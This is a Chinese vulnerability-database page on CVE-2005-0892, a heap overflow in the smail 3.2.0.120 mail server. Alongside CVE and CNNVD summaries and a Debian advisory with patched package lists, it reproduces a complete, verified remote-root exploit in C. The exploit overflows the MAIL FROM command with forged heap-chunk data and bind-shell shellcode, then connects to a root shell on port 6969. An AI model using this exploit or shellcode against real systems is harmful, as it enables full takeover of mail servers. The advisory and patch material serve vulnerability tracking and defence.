CVE-2005-0892
CVSS10.0
发布时间 :2005-03-28 00:00:00
修订时间 :2016-10-17 23:15:20
NMCOEPS    

[原文]Buffer overflow in smail 3.2.0.120 allows remote attackers or local users to execute arbitrary code via a long string in the MAIL FROM command and possibly other SMTP commands.


[CNNVD]Smail-3 堆溢出漏洞和信号处理漏洞(CNNVD-200503-142)

        Smail-3是一款邮件传输代理。
        Smail-3中存在一个堆溢出漏洞和一个信号处理漏洞,远程或本地用户都可以利用堆溢出漏洞以root权限执行任意代码,攻击还可能导致拒绝服务;本地用户可以利用信号处理漏洞以root用户权限执行任意代码,但尚未证实。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0892
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0892
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-142
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111177045217717&w=2
(UNKNOWN)  BUGTRAQ  20050325 smail remote and local root holes
http://www.debian.org/security/2005/dsa-722
(VENDOR_ADVISORY)  DEBIAN  DSA-722

- 漏洞信息

Smail-3 堆溢出漏洞和信号处理漏洞
危急 缓冲区溢出
2005-03-28 00:00:00 2005-10-20 00:00:00
远程※本地  
        Smail-3是一款邮件传输代理。
        Smail-3中存在一个堆溢出漏洞和一个信号处理漏洞,远程或本地用户都可以利用堆溢出漏洞以root权限执行任意代码,攻击还可能导致拒绝服务;本地用户可以利用信号处理漏洞以root用户权限执行任意代码,但尚未证实。
        

- 公告与补丁

         目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.weird.com/~woods/projects/smail.html

- 漏洞信息 (900)

Smail 3.2.0.120 Remote Root Heap Overflow Exploit (EDBID:900)
linux remote
2005-03-28 Verified
25 infamous41md
N/A [点击下载]
/*
 * 
 * 0
 *
 * smail preparse_address_1() heap bof remote root exploit
 *
 * infamous42md AT hotpop DOT com
 *
 * Shouts:
 *
 * BMF, wipe with the left, eat with the right
 *
 * Notes:
 *
 * You can't have any characters in overflow buffer that isspace() returns true
 * for.  The shellcode is clear of them, but if your return address or retloc
 * has one you gotta figure out another one.  My slack box has that situation,
 * heap is at 0x080d.. My gentoo laptop had no such problem and all was fine.  I
 * don't have anymore time to BS around with this and make perfect for any and
 * all, b/c I've got exam to study for and Law and Order:CI is on in an hour.
 * If the heap you're targetting is the same way, then try filling it up using
 * some other commands.  If the GOT you're targetting is at such address than
 * overwrite a return address on the stack.  Surely there's a way, check out the
 * source and be creative; I'm sure there are some memory leaks somewhere you
 * can use to fill up heap as well.
 *
 * You might run into some ugliness trying to automate this for a couple
 * reasons.  xmalloc() stores a cookie in front of buffer, and xfree() checks
 * for this cookie before calling free().  So you're going to need that aligned
 * properly unless you can cook up a way to exploit it when it bails out in
 * xfree() b/c of bad cookie and calls write_log() (this func calls malloc() so
 * maybe you can be clever and do something there). Furthermore I found that
 * when trying to trigger this multiple times the alignment was different each
 * time.  There are "definitely" more reliable ways to exploit this if you take
 * a deeper look into code which I don't have time to do right now.  The padding
 * parameter controls the alignment and the size of the chunk being allocated.
 * You'll probably have to play with it.  Yes that's fugly.
 *
 * [n00b@crapbox.outernet] ./a.out 
 * Usage: ./a.out < host > < padding > < retloc > < retaddr >
 *
 * [n00b@crapbox.outernet] ./a.out localhost 64 0xbffff39c 0x8111ea0
 * --{ Smack 1.oohaah
 *
 * --{ definitely, adv.:
 * --{ 1. Having distinct limits
 * --{ 2. Indisputable; certain
 * --{ 3. Clearly defined; explicitly precise
 *
 * --{ Said HELO
 *
 * --{ Sent MAIL FROM overflow
 *
 * --{ Going for shell in 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 
 *
 * --{ Attempting to redefine the meaning of 'definitely'
 *
 * --{ Got a shell
 *
 * --{ Updating Webster's
 * --{ definitely, adv.:
 * --{ 1. See specious
 *
 * --{ For the linguistically challenged...
 * --{ specious, adj. :
 * --{ 1. Having the ring of truth or plausibility but actually fallacious
 * --{ 2. Deceptively attractive
 *
 * id
 * uid=0(root) gid=0(root)
 * echo PWNED  
 * PWNED
 *
 *  - Connection closed by user
 *
 */

#include <stdio.h>
#include <ctype.h>
#include <sys/types.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/select.h>
#include <arpa/inet.h>


/* */
#define BS 0x1000
#define SMTP_PORT 25


#define Z(x, len) memset((x), 0, (len))
#define die(x) do{ perror((x)); exit(EXIT_FAILURE); }while(0)
#define bye(fmt, args...) do{ fprintf(stderr, fmt"\n", ##args); exit(EXIT_FAILURE); }while(0)


/* fat bloated call them shell code */
#define SHELL_LEN (sizeof(sc)-1)
#define SHELL_PORT 6969
#define NOP 0x90
char sc[] = 
"\xeb\x0e""notexploitable"
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x39\xc6\x04\x24\x02\x89\xe6\xb0\x02"
"\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50\x6a\x01\x6a\x02"
"\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a\x10\x56\x50\x89\xe1\xb0"
"\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31\xc0\x31\xdb\xb0\x66\xb3\x04\xcd"
"\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89"
"\xeb\x31\xc9\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x6b\x2c\x60\xcd"
"\x80";


/*  a dlmalloc chunk descriptor */
#define CHUNKSZ 0xfffffff8
#define CHUNKLEN sizeof(mchunk_t)
typedef struct _mchunk {
    size_t  dummy;
    size_t  prevsz;
    size_t  sz;
    long    fd;
    long    bk;
} mchunk_t;

/* */
ssize_t Send(int s, const void *buf, size_t len, int flags)
{
    ssize_t n;

    n = send(s, buf, len, flags);
    if(n < 0)
        die("send");

    return n;
}

/* */
ssize_t Recv(int s, void *buf, size_t len, int flags)
{
    ssize_t n;

    n = recv(s, buf, len, flags);
    if(n < 0)
        die("recv");

    return n;
}

/* */
int conn(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    struct sockaddr_in sa;

    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
	    bye("gethostbyname failed with error %s", hstrerror(h_errno));
    }
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
	    die("socket");

    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
	    die("connect");

    return sock;
}

/* */
void shell(char *host, u_short port)
{
    int sock = 0, l = 0;
    char buf[BS];
    fd_set rfds;

    sock = conn(host, port);

    printf("--{ Got a shell\n\n"
           "--{ Updating Webster's\n"
           "--{ definitely, adv.:\n"
           "--{ 1. See specious\n\n"
           "--{ For the linguistically challenged...\n"
           "--{ specious, adj. :\n"
           "--{ 1. Having the ring of truth or plausibility but "
           "actually fallacious\n"
           "--{ 2. Deceptively attractive\n\n"
          );

    FD_ZERO(&rfds);

    while (1) {
	    FD_SET(STDIN_FILENO, &rfds);
	    FD_SET(sock, &rfds);

	    if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
	        die("select");

	    if (FD_ISSET(STDIN_FILENO, &rfds)) {
            l = read(0, buf, BS);
            if(l < 0)
                die("read");
            else if(l == 0)
		        bye("\n - Connection closed by user\n");

	        if (write(sock, buf, l) < 1)
		        die("write");
	    }

	    if (FD_ISSET(sock, &rfds)) {
	        l = read(sock, buf, sizeof(buf));

	        if (l == 0)
		        bye("\n - Connection terminated.\n");
	        else if (l < 0)
		        die("\n - Read failure\n");

	        if (write(STDOUT_FILENO, buf, l) < 1)
		        die("write");
	    }
    }
}

/* */
int parse_args(int argc, char **argv, char **host, int *npad,
                    u_int *retloc, u_int *retaddr)
{
    if(argc < 5)
        return 1;

    *host = argv[1];
        
    if(sscanf(argv[2], "%d", npad) != 1)
        return 1;

    if(sscanf(argv[3], "%x", retloc) != 1)
        return 1;

    if(sscanf(argv[4], "%x", retaddr) != 1)
        return 1;

    return 0;
}

/* */
void sploit(int sock, int npad, u_int retloc, u_int retaddr)
{
    ssize_t n = 0;
    u_char  buf[BS],    pad[BS],    evil[BS];
    mchunk_t    chunk;

    Z(buf, BS), Z(pad, BS), Z(evil, BS),    Z(&chunk, CHUNKLEN);

    /* read greeting */
    n = Recv(sock, buf, BS, 0);
    if(n == 0)
        bye("Server didn't even say hi");

    /* send HELO */
    n = snprintf(buf, BS, "HELO localhost\r\n");
    Send(sock, buf, n, 0);
    Z(buf, BS);
    n = Recv(sock, buf, BS, 0);
    if(n == 0)
        bye("Server didn't respond to HELO");

    printf("--{ Said HELO\n\n");

    /*
     * Build evil chunk overflow.  The need to align chunk exactly makes this
     * not so robust.  In my short testing I wasn't able to get free() called
     * directly on an area of memory we control.  I'm sure you can though if you
     * take some time to study process heap behavior.  Note though that you'll
     * have to fill in the magic cookie field that xmalloc()/xfree() and some
     * other functions use, so you'll still need to have it aligned properly
     * which defeats the whole purpose.  This exploits the free() call on the
     * buffer we overflow, so you have to align the next chunk accordingly.
     * Anyhow on newest glibc there is a check for negative size field on the
     * chunk being freed, and program dies if it is negative (the exact
     * condition is not negative, but it has that effect pretty much, but go
     * look yourself ;)), So the techniques outlined by gera in phrack don't
     * work (being able to point all chunks at our two evil chunks).  Check out
     * most recent glibc code in _int_free() if you haven't already.
     */
    memset(pad, 'A', npad);

    chunk.dummy = CHUNKSZ;
    chunk.prevsz = CHUNKSZ;
    chunk.sz = CHUNKSZ;
    chunk.fd = retloc - 12;
    chunk.bk = retaddr;
    memcpy(evil, &chunk, CHUNKLEN);
    evil[CHUNKLEN] = 0;

    /* send the overflow */
    n = snprintf(buf, BS, "MAIL FROM:<A!@A:%s> %s%s\n", pad, evil, sc);
    Send(sock, buf, n, 0);
    Z(buf, BS);

    printf("--{ Sent MAIL FROM overflow\n\n");

#define SLEEP_TIME 15
    setbuf(stdout, NULL);
    printf("--{ Going for shell in ");
    for(n = 0; n < SLEEP_TIME; n++){
        printf("%d ", SLEEP_TIME-n);
        sleep(1);
    }
    puts("\n");
}


/*
 */
int main(int argc, char **argv)
{
    int sock = 0,   npad = 0;
    u_int   retloc  = 0,    retaddr = 0;
    char    *host = NULL;

    if(parse_args(argc, argv, &host, &npad, &retloc, &retaddr))
        bye("Usage: %s < host > < padding > < retloc > < retaddr >\n", argv[0]);

    printf("--{ Smack 1.oohaah\n\n");

    sock = conn(host, SMTP_PORT);

    printf("--{ definitely, adv.:\n"
           "--{ 1. Having distinct limits\n"
           "--{ 2. Indisputable; certain\n"
           "--{ 3. Clearly defined; explicitly precise\n\n"
          );

    sploit(sock, npad, retloc, retaddr);

    printf("--{ Attempting to redefine the meaning of 'definitely'\n\n");

    shell(host, SHELL_PORT);

    return EXIT_SUCCESS;
}

// milw0rm.com [2005-03-28]
		

- 漏洞信息 (F39119)

Debian Linux Security Advisory 722-1 (PacketStormID:F39119)
2005-08-07 00:00:00
Debian  security.debian.org
advisory,remote,overflow,arbitrary,local
linux,debian
CVE-2005-0892
[点击下载]

Debian Security Advisory DSA 722-1 - A buffer overflow has been discovered in Smail, an electronic mail transport system, which allows remote attackers and local users to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 722-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
May 9th, 2005                           http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : smail
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-0892
Debian Bug     : 301428

A buffer overflow has been discovered in Smail, an electronic mail
transport system, which allows remote attackers and local users to
execute arbitrary code.

For the stable distribution (woody) this problem has been fixed in
version 3.2.0.114-4woody1.

For the unstable distribution (sid) this problem has been fixed in
version 3.2.0.115-7.

We recommend that you upgrade your smail package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1.dsc
      Size/MD5 checksum:      625 ea1b8e719083ae0ce816ce854c9fad4d
    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1.diff.gz
      Size/MD5 checksum:    51389 364ffc0fcdd9a7a94beb06bd3a1abfca
    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114.orig.tar.gz
      Size/MD5 checksum:   849729 e7e42019fbaebbcab6ec73d76b662fef

  Alpha architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_alpha.deb
      Size/MD5 checksum:   610220 63fe9b4c962ccef3dffd799f8d586e7c

  ARM architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_arm.deb
      Size/MD5 checksum:   537306 b1d5d1ac388bc0eecead712a295a5cfd

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_i386.deb
      Size/MD5 checksum:   515616 2c7270f410af518faed52ca745328a36

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_ia64.deb
      Size/MD5 checksum:   698446 3102e74802e5440302ce0ae739f8057a

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_hppa.deb
      Size/MD5 checksum:   584080 e2611ee5b7bfe3a6ad2d9c92beca0319

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_m68k.deb
      Size/MD5 checksum:   501518 f02f44efc4d6b724c2ace003200fa27d

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_mips.deb
      Size/MD5 checksum:   557824 29937040a42bf5247183fb70f1bf492f

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_mipsel.deb
      Size/MD5 checksum:   558316 9b5684fe178ca5932f8ea36024cf8dea

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_powerpc.deb
      Size/MD5 checksum:   541556 408e6fed7aa9425645a1f9d1c5d13298

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_s390.deb
      Size/MD5 checksum:   535298 d7d88d608a1d9a59bccc9d2b1b2059c6

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/s/smail/smail_3.2.0.114-4woody1_sparc.deb
      Size/MD5 checksum:   558944 9f36b924b5fdf1733fd0b19945302fe6


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFCf2MHW5ql+IAeqTIRAho7AJ9UmrehHKl8IOrE4uXYg1kc2BRCJgCgrAi4
CO3sSkYtZr11V0bppPWjVl0=
=40ga
-----END PGP SIGNATURE-----

    

- 漏洞信息

15065
smail MAIL FROM Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-03-25 Unknow
2005-03-27 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Smail-3 Multiple Remote and Local Vulnerabilities
Unknown 12899
Yes Yes
2005-03-25 12:00:00 2009-07-12 11:56:00
Discovery is credited to sean <infamous41md@hotpop.com>.

- 受影响的程序版本

Smail Smail-3 3.2 .0.120
Smail Smail-3 3.2 .0.114
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0

- 漏洞讨论

Smail-3 is reported prone to multiple vulnerabilities. These issues can allow a local or remote attacker to execute arbitrary code on a vulnerable computer. A successful attack may lead to a complete compromise.

The following specific issues were identified:

Smail-3 is vulnerable to a remote heap overflow vulnerability. An attacker can leverage this vulnerability to execute arbitrary code with superuser privileges. Attack attempts may also trigger a denial of service condition.

The application is also reported prone to various potential vulnerabilities arising from insecure handling of heap memory by signal handlers. These issues are not confirmed at the moment.

Smail-3 3.2.0.120 is affected by these issues. Other versions may be vulnerable.

This BID will be updated when more information becomes available.

- 漏洞利用

The following exploit is made available by sean &lt;infamous41md@hotpop.com&gt;:

- 解决方案

Debian has released advisory DSA 722-1 to address these issues. Please see the referenced advisory for more information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


Smail Smail-3 3.2 .0.114

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站